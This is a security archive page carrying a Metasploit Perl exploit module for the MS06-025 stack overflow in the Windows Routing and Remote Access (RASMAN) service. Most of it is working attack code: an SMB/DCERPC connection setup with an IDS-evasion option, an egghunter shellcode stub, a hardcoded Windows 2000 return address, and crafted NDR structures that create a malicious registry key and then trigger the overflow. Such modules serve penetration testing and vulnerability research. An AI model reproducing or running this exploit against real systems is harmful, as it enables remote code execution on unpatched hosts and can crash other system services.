what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

rasman.pm.txt

rasman.pm.txt
Posted Jul 2, 2006
Authored by H D Moore, Pusscat | Site metasploit.com

Microsoft RRAS RASMAN Registry stack overflow Metasploit exploit that makes use of the vulnerability discussed in MS06-025.

tags | exploit, overflow, registry
SHA-256 | a7aedb2c3eea8e488a3e772cf3679c7965abbe0c0bce99960ca234e4a621aa33

rasman.pm.txt

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025_rasman;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::SMB;
use Pex::NDR;

my $advanced = {
'FragSize' => [ 256, 'The DCERPC fragment size' ],
'BindEvasion' => [ 0, 'IDS Evasion of the Bind request' ],
'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],
};

my $info = {
'Name' => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'Pusscat <pusscat [at] gmail.com>',
'H D Moore <hdm [at] metasploit.com>'
],

'Arch' => ['x86'],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The target address' ],

# SMB connection options
'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
},

'Payload' =>
{
'Space' =>1024,
'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",

# sub esp, 4097 + inc esp makes stack happy
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},

'Description' => Pex::Text::Freeform(
qq{
This module exploits a registry-based stack overflow in the Windows Routing
and Remote Access Service. Since the service is hosted inside svchost.exe,
a failed exploit attempt can cause other system services to fail as well.
A valid username and password is required to exploit this flaw on Windows 2000.
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
Exploiting this flaw involves two distinct steps - creating the registry key
and then triggering an overwrite based on a read of this key. Once the key is
created, it cannot be recreated. This means that for any given system, you
only get one chance to exploit this flaw. Picking the wrong target will require
a manual removal of the following registry key before you can try again:
HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
}
),

'Refs' =>
[
[ 'BID', '18325' ],
[ 'CVE', '2006-2370' ],
[ 'OSVDB', '26437' ],
[ 'MSB', 'MS06-025' ]
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Automatic' ],
[ 'Windows 2000', 0x750217ae ], # call esi
],

'Keys' => ['rras'],

'DisclosureDate' => 'Jun 13 2006',
};

sub new {
my ($class) = @_;
my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
return ($self);
}

sub Exploit {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

my $FragSize = $self->GetVar('FragSize') || 256;
my $target = $self->Targets->[$target_idx];

my ( $res, $rpc );

my $pipe = "\\" . $self->GetVar("SMBPIPE");
my $uuid = '20610036-fa22-11cf-9823-00a0c911e5df';
my $version = '1.0';

my $handle =
Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
$pipe );

my $dce = Pex::DCERPC->new(
'handle' => $handle,
'username' => $self->GetVar('SMBUSER'),
'password' => $self->GetVar('SMBPASS'),
'domain' => $self->GetVar('SMBDOM'),
'fragsize' => $self->GetVar('FragSize'),
'bindevasion' => $self->GetVar('BindEvasion'),
'directsmb' => $self->GetVar('DirectSMB'),
);

if ( !$dce ) {
$self->PrintLine("[*] Could not bind to $handle");
return;
}

my $smb = $dce->{'_handles'}{$handle}{'connection'};
if ( $target->[0] =~ /Auto/ ) {
if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
$target = $self->Targets->[1];
$self->PrintLine('[*] Detected a Windows 2000 target...');
}
#elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
# $target = $self->Targets->[2];
# $self->PrintLine('[*] Detected a Windows XP target...');
#}
else {
$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
return;
}
}

# Shiny new egghunt from the 3.0 code :-)
my $egghunt =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
"\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
"\x41\x41\x41\x41".
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

# Pick a "filler" character that we know doesn't get mangled
# by the wide string conversion routines
my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
my $filler = substr($fillset, rand(length($fillset)), 1);
my $eggtag = '';
my $pattern = '';

while (length($eggtag) < 4) {
$eggtag .= substr($fillset, rand(length($fillset)), 1);
}

# Configure the egg
substr($egghunt, 0x12, 4, $eggtag);

# We use an egghunter to give us nearly unlimited room for shellcode
my $eggdata =
($filler x 1024).
$eggtag.
$eggtag.
$shellcode.
($filler x 1024);

# Mini-payload that launches the egghunt
my $bof = $filler x 178;
substr($bof, 84, length($egghunt), $egghunt);

# Base pointer override occurs with this string
my $pat =
($filler x 886).
pack('V', $target->[1]).
($filler x 3). "\xc0".
$bof;

# The vulnerability is triggered with the second field of this structure
my $type2 =
Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
Pex::NDR::Long( int(rand(0xffffffff)) ).
Pex::NDR::Long( int(rand(0xffffffff)) );

# Another gigantic structure, many of these fields up as registry values
my $type1 =
Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
Pex::NDR::Long(0x45).
$type2.
Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::Long(int(rand(0xffffffff)));

# Create the actual RPC stub and tack our payload on the end
my $stub =
$type1.
Pex::NDR::Long(int(rand(0xffffffff))).
$eggdata;

$self->PrintLine("[*] Creating the malicious registry key...");
my @response = $dce->request( $handle, 0x0A, $stub );

$self->PrintLine("[*] Triggering the base pointer overwrite...");
my @response = $dce->request( $handle, 0x0A, $stub );

if (@response) {
$self->PrintLine('[*] RPC server responded with:');
foreach my $line (@response) {
$self->PrintLine( '[*] ' . $line );
}
$self->PrintLine('[*] This probably means that the system is patched');
}
return;
}

1;
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close